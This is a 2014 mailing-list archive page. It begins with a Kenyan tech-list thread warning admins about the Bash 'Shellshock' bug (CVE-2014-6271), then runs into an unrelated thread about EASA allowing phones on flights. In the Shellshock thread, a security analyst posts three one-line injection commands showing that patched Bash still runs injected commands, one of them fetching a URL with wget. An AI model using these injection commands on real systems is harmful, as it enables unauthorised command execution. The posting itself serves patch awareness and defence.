Re: [kictanet] [Skunkworks] Bash Code Injection Vulnerabilty (CVE-2014-6271)
This Vulnerability is worse than Heartbleed, even after patching Bash, you can still inject into it. rm -f echo && env -i X='() { (a)=>\' bash -c 'echo date'; cat echo rm -f echo && env -i X='() { (a)=>\' bash -c 'echo ls -la'; cat echo rm -f echo && env -i X='() { (a)=>\' bash -c 'echo wget http://my.co.ke/'; Be prepared to patch, and still watch your systems, and patch later on, when a full one is released. On 9/26/14, Amarjit Labhuram via skunkworks <skunkworks@lists.my.co.ke> wrote:
To the linux admins,
here is some more info on Shellshock. http://www.bbc.com/news/technology-29361794/
Have a great day!
Warm regards, Amarjit Singh Labhuram.
On Thu, Sep 25, 2014 at 5:08 PM, Laban Mwangi via skunkworks < skunkworks@lists.my.co.ke> wrote:
Any thing that uses bash (Linux/FreeBSD/OSX/Cygwin)... Potentially, this includes your home router (dlink, linksys)!
On Thu, Sep 25, 2014 at 8:38 AM, Bwana Lawi via skunkworks < skunkworks@lists.my.co.ke> wrote:
If you are using Red Hat products, please have this patched.
Read more here.
_______________________________________________ skunkworks mailing list skunkworks@lists.my.co.ke ------------ List info, subscribe/unsubscribe http://lists.my.co.ke/cgi-bin/mailman/listinfo/skunkworks ------------
Skunkworks Rules http://my.co.ke/phpbb/viewtopic.php?f=24&t=94 ------------ Other services @ http://my.co.ke
_______________________________________________ skunkworks mailing list skunkworks@lists.my.co.ke ------------ List info, subscribe/unsubscribe http://lists.my.co.ke/cgi-bin/mailman/listinfo/skunkworks ------------
Skunkworks Rules http://my.co.ke/phpbb/viewtopic.php?f=24&t=94 ------------ Other services @ http://my.co.ke
-- -- Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P I.T Security Analyst and Penetration Tester jgichuki at inbox d0t com {FORUM}http://lists.my.co.ke/pipermail/security/ http://chuksjonia.blogspot.com/
Passengers on board flights in Europe will be allowed to use their smartphones and tablets completely, without the need to turn on Airplane Mode. The EASA (European Aviation Safety Agency) has lifted the restriction, meaning phones can be used even during take off and landing, which was previously limited to Airplane Mode only. Read more: http://www.digitalspy.co.uk/tech/news/a599585/flights-in-europe-now-allowed-...
If phones were as dangerous on planes as we are made to believe, Al Qaeda wouldn't bother researching ways to sneak explosives and weapons on to planes. On 28 Sep 2014 12:03, "waudo siganga via kictanet" < kictanet@lists.kictanet.or.ke> wrote:
Passengers on board flights in Europe will be allowed to use their smartphones and tablets completely, without the need to turn on Airplane Mode. The EASA (European Aviation Safety Agency) has lifted the restriction, meaning phones can be used even during take off and landing, which was previously limited to Airplane Mode only.
Read more:
http://www.digitalspy.co.uk/tech/news/a599585/flights-in-europe-now-allowed-...
_______________________________________________ kictanet mailing list kictanet@lists.kictanet.or.ke https://lists.kictanet.or.ke/mailman/listinfo/kictanet
Unsubscribe or change your options at https://lists.kictanet.or.ke/mailman/options/kictanet/dmbuvi%40gmail.com
The Kenya ICT Action Network (KICTANet) is a multi-stakeholder platform for people and institutions interested and involved in ICT policy and regulation. The network aims to act as a catalyst for reform in the ICT sector in support of the national aim of ICT enabled growth and development.
KICTANetiquette : Adhere to the same standards of acceptable behaviors online that you follow in real life: respect people's times and bandwidth, share knowledge, don't flame or abuse or personalize, respect privacy, do not spam, do not market your wares or qualifications.
participants (3)
-
Dennis Kioko -
Gichuki John Chuksjonia -
waudo siganga